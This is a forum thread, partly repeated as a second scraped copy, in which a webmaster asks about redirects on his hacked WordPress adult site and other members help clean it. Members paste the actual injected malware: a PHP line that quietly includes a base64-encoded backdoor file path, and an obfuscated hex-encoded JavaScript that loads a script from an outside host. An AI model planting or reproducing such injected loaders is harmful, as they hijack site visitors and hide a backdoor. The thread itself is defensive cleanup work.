Redirection issue - GoFuckYourself.com

Chezter · 12-14-2011, 01:33 PM

Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com

Barry-xlovecam · 12-14-2011, 01:46 PM

This is what I found:

Code:

01:47:03.040	0.376	829	275	GET	302	Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4	http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg==

01:47:03.613	0.193	540	203	GET	302	Redirect to: http://www.cam4.com?act=200116~us-c	http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4

Chezter · 12-14-2011, 01:55 PM

Ok thank you, but I still do not know how to figure out what is causing it from this peice of code, but at least I see it is really truth

Colmike9 · 12-14-2011, 01:56 PM

If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:

teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js

MikeFold · 12-14-2011, 02:00 PM

went to your site via google search
after the page loaded I
got redirected here:

http://17.uso2.com/

edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
LOL

Colmike9 · 12-14-2011, 02:08 PM

Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish

Also, is that last line of js after html tag supposed to be there?..

Chezter · 12-14-2011, 02:29 PM

I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...

Chezter · 12-14-2011, 02:35 PM

I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?

Colmike9 · 12-14-2011, 02:50 PM

It doesn't redirect for me anymore so I hope that fixed your problem

Chezter · 12-14-2011, 02:58 PM

Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:

<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>

Colmike9 · 12-14-2011, 03:21 PM

Quote:

Originally Posted by Chezter

Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:

<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>

That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.

And change your passwords

ruff · 12-14-2011, 03:24 PM

Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

anexsia · 12-14-2011, 03:29 PM

Quote:

Originally Posted by Chezter

Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:

<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>

Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actually code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.

Colmike9 · 12-14-2011, 03:39 PM

Quote:

Originally Posted by ruff

Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

Thats the script under html that I was talking about, thought it was deleted.. My bad

Quote:

Originally Posted by Colmike7

Also, is that last line of js after html tag supposed to be there?..

MediaGuy · 12-14-2011, 03:53 PM

Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.

I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.

To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.

And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.

When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.

Oh, and update your version of wordpress.

Barry-xlovecam · 12-14-2011, 03:54 PM

line 586 index.html



</body>

</html>

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

Chezter · 12-15-2011, 08:55 AM

It is the same code, just it was not only in header but it is in footerm index, links... everywhere

Chezter · 12-15-2011, 09:29 AM

"Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months

that crazy, I would like to how I could never see it in any site...

Chezter · 12-15-2011, 01:13 PM

Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.

MikeFold · 12-15-2011, 01:42 PM

Quote:

Originally Posted by Chezter

Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.

ok...tried it for you again (different box and browser)
it tried to hijack my browser.....i viewed source and this was still at the bottom

Code:

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>

Barry-xlovecam · 12-15-2011, 01:46 PM

check the vision of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe related

Chezter · 12-15-2011, 03:23 PM

I use total commander 7.04 and it is probably not up to date

Chezter · 12-15-2011, 04:23 PM

Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it still there than I'm really fucked....

Chezter · 12-17-2011, 08:45 AM

I know I'm annoying, but is it still redirecting or not?

12-14-2011, 01:33 PM	#1
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	Redirection issue Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com Last edited by Chezter; 12-14-2011 at 01:34 PM..

12-14-2011, 02:00 PM	#5
MikeFold Confirmed User Join Date: Nov 2001 Location: semi-retired Posts: 465	went to your site via google search after the page loaded I got redirected here: http://17.uso2.com/ edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds) LOL __________________ nothing to promote Last edited by MikeFold; 12-14-2011 at 02:07 PM..

12-14-2011, 03:24 PM	#12
ruff I have a plan B Industry Role: Join Date: Aug 2004 Location: Seattle - Miami - St Kitts Posts: 5,501	Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me. <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script> __________________ CryptoFeeds

12-14-2011, 03:53 PM	#15
MediaGuy Confirmed User Industry Role: Join Date: Sep 2004 Location: Montrealquebecanada Posts: 5,500	Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then. I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site. To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did. And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out. When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes. Oh, and update your version of wordpress. __________________ YOU Are Industry News! Press Releases: pr[at]payoutmag.com Facebook: Payout Magazine! Facebook: MIKEB! ICQ: 248843947 Skype: Mediaguy1

12-15-2011, 08:55 AM	#17
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	It is the same code, just it was not only in header but it is in footerm index, links... everywhere Last edited by Chezter; 12-15-2011 at 09:09 AM..

12-14-2011, 01:55 PM	#3
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	Ok thank you, but I still do not know how to figure out what is causing it from this peice of code, but at least I see it is really truth

12-14-2011, 01:56 PM	#4
Colmike9 (>^_^)b Industry Role: Join Date: Dec 2011 Posts: 7,224	If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header: teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js

12-14-2011, 02:08 PM	#6
Colmike9 (>^_^)b Industry Role: Join Date: Dec 2011 Posts: 7,224	Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish Also, is that last line of js after html tag supposed to be there?..

12-14-2011, 02:29 PM	#7
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...

12-14-2011, 02:35 PM	#8
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?

12-14-2011, 02:50 PM	#9
Colmike9 (>^_^)b Industry Role: Join Date: Dec 2011 Posts: 7,224	It doesn't redirect for me anymore so I hope that fixed your problem

12-14-2011, 03:54 PM	#16
Barry-xlovecam It's 42 Industry Role: Join Date: Jun 2010 Location: Global Posts: 18,083	line 586 index.html <!-- /wrapper --> </body> </html> <script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>

12-15-2011, 09:29 AM	#18
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	"Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months that crazy, I would like to how I could never see it in any site...

12-15-2011, 01:13 PM	#19
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.

12-15-2011, 01:46 PM	#21
Barry-xlovecam It's 42 Industry Role: Join Date: Jun 2010 Location: Global Posts: 18,083	check the vision of your FTP program -- is it up to date? there was a problem like this a while back with old Filezilla apps -- maybe related

12-15-2011, 03:23 PM	#22
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	I use total commander 7.04 and it is probably not up to date

12-15-2011, 04:23 PM	#23
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it still there than I'm really fucked....

12-17-2011, 08:45 AM	#24
Chezter Confirmed User Industry Role: Join Date: Apr 2008 Location: Brno, Czech rep. Posts: 565	I know I'm annoying, but is it still redirecting or not?